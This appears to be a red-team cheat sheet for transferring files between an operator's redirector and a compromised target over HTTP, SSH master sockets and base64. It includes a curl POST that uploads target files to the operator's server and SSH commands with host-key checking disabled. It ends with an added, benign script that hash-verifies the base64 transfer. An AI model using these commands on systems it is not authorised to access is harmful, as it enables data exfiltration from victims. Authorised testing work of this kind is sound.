# **Basic Information**

# **Linux**

## **HTTP**

```bash
# run on the op station
python3 -m http.server <redir_port>
python3 -m pip install --user uploadserver
python3 -m uploadserver -d <dir> --basic-auth <username>:<password> <redir_port>

# run on target
wget http://<redir_ip>:<redir_port>/<file.txt>
curl http://<redir_ip>:<redir_port>/<file.txt> -o <file>
curl -X POST http://<redir_ip>:<redir_port>/upload -F 'files=@<file.txt>' -u <username>:<password>
```

## **SSH**

```bash
# ensure ControlMaster is enabled for the ssh client
# echo " ControlMaster auto" | sudo tee -a /etc/ssh/ssh_config
# sudo systemctl restart ssh

# connect to target and set up a master socket
ssh -M -S /tmp/socket_name -p <target_port> <user>@<target_ip> -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no

# have permissions to read the remote file, pull to local host
scp -o ControlPath=/tmp/socket_name -s -T dummy:'/remote/file.txt' /local/file.txt

# have permissions to read directory, pull to local host
scp -o ControlPath=/tmp/socket_name -s -T -r dummy:'/remote/dir' /local/dir

# do not have rights to read file, pull to local host
ssh -S /tmp/socket_name dummy "sudo cat /remote/file.txt" > /local/file.txt

# push a file to the target
scp </local/file.txt> <user>@<target_ip>:</remote/file.txt>
```

## **Base64**

```bash
# run on the op station
file <file.txt>
md5sum <file.txt>
base64 <file.txt> -w 0

# run on target, validate transfer was successful via hash
echo <base64_encoded_data> | base64 -d > <file.txt>
file <file.txt>
md5sum <file.txt>
```

# **Windows**

## **SSH**

```bash
# to enable master sockets, modify the client config so that ControlMaster is set to auto or yes

# connect to target and set up a master socket
ssh -M -S /tmp/socket_name -p <target_port> <user>@<target_ip> -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no

# have permissions to read the remote file, pull to local host
scp -o ControlPath=/tmp/socket_name -s -T dummy:'C:\\remote\\file.txt' /local/file.txt
scp -o ControlPath=/tmp/socket_name -s -T '@:/C:/remote/*.log' /local/file.txt

# have permissions to read directory, pull to local host
scp -o ControlPath=/tmp/socket_name -s -T -r dummy:'C:\\remote\\dir' /local/dir

# push a file to the target
scp </local/file.txt> <user>@<target_ip>:</remote/file.txt>
```

## **Base64**

```bash
# run on the op station

# run on target
```

# **References**

- [Using the SSH "Konami Code" (SSH Control Sequences)](https://www.sans.org/blog/using-the-ssh-konami-code-ssh-control-sequences)

# **Practical Application**

| Platform | Name | Notes |
| -------- | ---- | ----- |
|          |      |       |
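
The Linux Base64 procedure above (hash on the op station, decode on the target, compare hashes), wrapped so that a truncated or corrupted paste is rejected before the file is written into place. This is an added example, not part of the original page: the function names are hypothetical, the sample data is constructed, and it uses `sha256sum` where the page uses `md5sum`.

```bash
# Added example (not from the original page): Base64 transfer with hash validation.
# Function names are hypothetical. Uses sha256sum where the page uses md5sum.

# Op station side: print "<sha256> <base64>" for a file, on one line.
b64_pack() {
    local src="$1"
    printf '%s %s\n' "$(sha256sum < "$src" | cut -d' ' -f1)" \
                     "$(base64 -w 0 < "$src")"
}

# Target side: decode into a temp file, compare digests, and move the file
# into place only on a match. Returns 1 on a bad decode or digest mismatch.
b64_unpack_verify() {
    local expected="$1" data="$2" dest="$3" tmp actual
    tmp=$(mktemp) || return 1
    if ! printf '%s' "$data" | base64 -d > "$tmp" 2>/dev/null; then
        rm -f "$tmp"
        return 1
    fi
    actual=$(sha256sum < "$tmp" | cut -d' ' -f1)
    if [ "$actual" != "$expected" ]; then
        rm -f "$tmp"
        return 1
    fi
    mv "$tmp" "$dest"
}

# Demo on constructed sample data: a clean round trip, then a truncated paste.
demo_dir=$(mktemp -d)
printf 'constructed sample data\n' > "$demo_dir/in.txt"
packed=$(b64_pack "$demo_dir/in.txt")
sum=${packed%% *}
b64=${packed#* }
b64_unpack_verify "$sum" "$b64" "$demo_dir/out.txt" && echo "intact copy: verified"
b64_unpack_verify "$sum" "${b64%????}" "$demo_dir/cut.txt" || echo "truncated copy: rejected"
rm -rf "$demo_dir"
```

Losing the tail of a long pasted string still decodes cleanly, so the digest comparison is the only step that catches it.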